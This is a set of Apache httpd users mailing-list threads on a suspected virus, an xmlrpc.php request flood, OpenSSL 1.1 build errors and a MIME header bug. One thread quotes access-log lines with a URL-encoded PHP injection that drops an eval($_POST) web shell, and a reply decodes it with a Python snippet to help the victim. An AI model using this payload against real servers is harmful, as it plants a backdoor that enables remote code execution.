Re: [users@httpd] Possible virus via httpd server

2016-01-04 Thread Kent Frazier 


You might try submitting the file at https://www.virustotal.com
and see what it detects.

On 1/4/16 8:18 AM, Michael D. Berger wrote:

Examining with Lemmy (A Windows version of VI), it looks like a binary file.
Size is 181.4 KB.
I am considering my favorite virus remover: DBAN, but it would take several
days work to
recover from that.

Mike.
--
Michael D. Berger
m.d.ber...@ieee.org
http://www.rosemike.net/



-Original Message-
From: Daniel Beardsmore [mailto:dan...@trustnetworks.co.uk]
Sent: Monday, January 04, 2016 05:03
To: users@httpd.apache.org
Subject: RE: [users@httpd] Possible virus via httpd server

Well, what do you see if you examine the file in a text editor?


-Original Message-
From: Michael D. Berger [mailto:m.d.ber...@ieee.org]
Sent: 04 January 2016 05:03
To: Apache-Users
Subject: [users@httpd] Possible virus via httpd server

Using my WinXP Firefox client to access my previously working httpd
2.4 server on Fedora 23 gets a file named 1OfvyQ5L instead of my
index.html .  Do you think I have a virus on my Linux box?  I did
notice that my iptables is not as tight as it should be.

--
Michael D. Berger
m.d.ber...@ieee.org
http://www.rosemike.net/





-







-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Possible DOS Attack

2016-05-20 Thread Kent Frazier 
The abuse email address for  191.96.249.52 is ab...@dmzhost.co
(though most ISPs don't seem to care whether one of their systems has
been hacked or not)

On 5/20/16 4:00 PM, Roman Gelfand wrote:
> In the last 2 days we have received roughly 1milion of the following
> requests.  Just to confirm, is this a DOS attack?
>
> 191.96.249.52 - - [20/May/2016:18:19:22 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:22 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:23 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:23 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:23 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:23 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:23 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:23 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:24 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:25 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:25 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:25 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:25 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:25 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:25 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:26 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:26 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:28 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:28 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:29 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:29 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:29 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:29 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:30 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:30 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:30 -0400] "POST /xmlrpc.php
> HT

[users@httpd] httpd-2.4.25 compile fail

2016-12-26 Thread Kent Frazier 
I'm trying (unsuccessfully) to build on a Mac Pro version 10.12.2
(Sierra Darwin Kernel Version 16.3.0)

libtool (GNU libtool) 2.4

OpenSSL 1.1.0c  10 Nov 2016

/usr/local/apr/build-1/libtool --silent --mode=link
/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/cc
 
-g -O2   -L/usr/local/lib -lssl -lcrypto -lpthread  \
 -o ab  ab.lo   /usr/local/apr/lib/libaprutil-1.la
-lexpat -liconv /usr/local/apr/lib/libapr-1.la -lpthread
Undefined symbols for architecture x86_64:
  "_CRYPTO_malloc_init", referenced from:
  _main in ab.o
  "_SSLv2_client_method", referenced from:
  _main in ab.o
ld: symbol(s) not found for architecture x86_64

anybody know what's going on?


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] problem compiling apache httpd server 2.4.25 with openssl 1.1.0c version on oel 6.8

2017-01-26 Thread Kent Frazier 
I'm running 2.4.25 with openssl 1.1.0c on a MAC. I had slightly
different issues, however. I was able to adapt the patches for a 2.4.23
version available at 
https://bz.apache.org/bugzilla/attachment.cgi?id=34182&action=edit
I have no idea whether this will work for you, or whether it has been
sufficiently tested to meet your criteria. (My criteria was that I just
wanted to play with it).

On 1/26/17 12:18 PM, Daniel wrote:
> This has been said before in the mailing list very often. AFK apache
> 2.4.x is not compatible with openssl 1.1.x. 
>
> 2017-01-26 21:07 GMT+01:00 Stéphane Laurencelle
>  >:
>
> Hello,
>
> I'm trying to compile apache httpd 2.4.25 on oracle linux 6.8, i
> install openssl 1.1.0c version 
>
> here is the line i use to configure, this one did not return any error
>
> ./configure --prefix=/usr/local/src/httpd-2.4.25
> --with-ssl=/usr/local/ssl --enable-ssl=shared --with-mpm=worker
> --enable-so --enable-mods-shared=all --enable-proxy
> --with-apr=/usr/local/apr --with-pcre=/usr/local/pcre
>
> the next step i do is doing the command make to compile the httpd
> server and here is the error i got at the end
>
> /usr/local/apr/build-1/libtool --silent --mode=link gcc -std=gnu99
>  -g -O2 -pthread   -lssl -lcrypto -lrt -lcrypt -lpthread  \
>  -o ab  ab.lo
>  /usr/local/apr/lib/libaprutil-1.la 
> -lexpat /usr/local/apr/lib/libapr-1.la  -lrt
> -lcrypt -lpthread -lm
> ab.o: In function `ssl_print_cert_info':
> /usr/local/src/httpd-2.4.25/support/ab.c:640: undefined reference
> to `X509_get_version'
> /usr/local/src/httpd-2.4.25/support/ab.c:642: undefined reference
> to `X509_getm_notBefore'
> /usr/local/src/httpd-2.4.25/support/ab.c:646: undefined reference
> to `X509_getm_notAfter'
> ab.o: In function `ssl_state_cb':
> /usr/local/src/httpd-2.4.25/support/ab.c:562: undefined reference
> to `SSL_in_init'
> /usr/local/src/httpd-2.4.25/support/ab.c:562: undefined reference
> to `SSL_is_server'
> ab.o: In function `sk_X509_num':
> /usr/local/include/openssl/x509.h:97: undefined reference to
> `OPENSSL_sk_num'
> ab.o: In function `sk_X509_value':
> /usr/local/include/openssl/x509.h:97: undefined reference to
> `OPENSSL_sk_value'
> ab.o: In function `test':
> /usr/local/src/httpd-2.4.25/support/ab.c:1877: undefined reference
> to `SSL_in_init'
> ab.o: In function `main':
> /usr/local/src/httpd-2.4.25/support/ab.c:2169: undefined reference
> to `TLS_client_method'
> /usr/local/src/httpd-2.4.25/support/ab.c:2468: undefined reference
> to `CRYPTO_malloc_init'
> /usr/local/src/httpd-2.4.25/support/ab.c:2470: undefined reference
> to `OPENSSL_init_ssl'
> /usr/local/src/httpd-2.4.25/support/ab.c:2471: undefined reference
> to `OPENSSL_init_ssl'
> /usr/local/src/httpd-2.4.25/support/ab.c:2480: undefined reference
> to `SSL_CTX_set_options'
> /usr/local/src/httpd-2.4.25/support/ab.c:2395: undefined reference
> to `TLS_client_method'
> collect2: ld returned 1 exit status
> make[2]: *** [ab] Error 1
> make[2]: Leaving directory `/usr/local/src/httpd-2.4.25/support'
> make[1]: *** [all-recursive] Error 1
> make[1]: Leaving directory `/usr/local/src/httpd-2.4.25/support'
> make: *** [all-recursive] Error 1
> [root@mandos httpd-2.4.25]
>
> Hope someone hae a solution, i found some stuff about a bug on the
> 2.4.23 version and the guys have to go back to the opsnssl 1.0.x
> version.
>
> Best regards, 
>
> Stephane
>
>
>
>
>
>
> -- 
> *Daniel Ferradal*
> IT Specialist
>
> emaildferradal at gmail.com 
> linkedin es.linkedin.com/in/danielferradal
>

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Kent Frazier 

If you have python installed...
The following python script shows some simple commands for decoding (for 
future reference).


test =""" 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> 
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B

> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> 
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B

> HTTP/1.1" 200 90"""
import urllib.parse
print(urllib.parse.unquote(test))
import base64
print(base64.b64decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'))

It yields...
python unquote.py
 
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
 '->|';file_put_contents($_SERVER['DOCUME
> 
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo 
'|<-';

> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> 
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo 
'->|';file_put_contents($_SERVER['DOCUME
> 
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo 
'|<-';

> HTTP/1.1" 200 90
b''

I also have a program that attempts to get an email address to notify in 
the event of abuse. It yields the following.


python getAbuseEmail.py 91.200.12.33
['n...@lugalink.net']

though it is unlikely you'll get a response ;-)


On 2/6/2017 8:36 AM, Jack Swan wrote:

I didn't decode it all.  I'll leave the rest up to you, but the %characters are 
hexadecimal characters.  Look up hex charset.

So the first line translates to (I may have missed a char or two...)

GET/?1=@ini_set("display_errors", 
0);set_time_limit("0");@set_magic_quotes_runtime();echo  
'->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
 '|<-';


- Original Message -
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
Subject: [users@httpd] am i hacked ?

Hi,

just in the moment i found two very weird entries in may access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90

What upsets me is that these two requests have statuscode 200, which mean it 
was successfull.
The IP is from ukraine. Where can i find out what these %charcacters mean ? 
Does anyone understand what happened here ? It's apache 2.2.3 64bit.

Thanks for any hint.

Bernd




-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Malformed header "Content-Type: text/plain\t" with .el file

2017-04-11 Thread Kent Frazier 

On 4/11/2017 12:15 PM, Hanno Böck wrote:

Hi,

I am observing a behavior and don't really know how to make sense of
it. It may very well be that I hit a bug, but I wanted to ask for
feedback to confirm it.

When I download .el files (EMACS Lisp scripts) on an apache server I
get a very strange header back:
"Content-Type: text/plain\t"

Please note the "\t" at the end, which shouldn't be here.
I can reproduce this on different Gentoo systems, but not on Debian or
Ubuntu.

To reproduce:
* Put a .el script in the webroot, e.g. get one from here:
https://git.savannah.gnu.org/cgit/emacs.git/plain/lisp/abbrev.el
* Download it with "wget -S [url]" (-S makes wget show all the
   HTTP headers).
For testing I have put an example on my server:
https://files.hboeck.de/abbrev.el
(the header contains an additional charset=UTF-8, because that's
configured as default on that server, but it still shows the strange
"\t")

The "magic" file shipped with httpd contains this, and I think this is
the source:
0   string  ;;  text/plain  8bit

I guess somehow the tab past the content type isn't stripped away, but
instead escaped and left in the header.

Can others confirm this behavior? Ideas how to fix this?


I guess you could try replacing the tab in the magic file with a space.


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org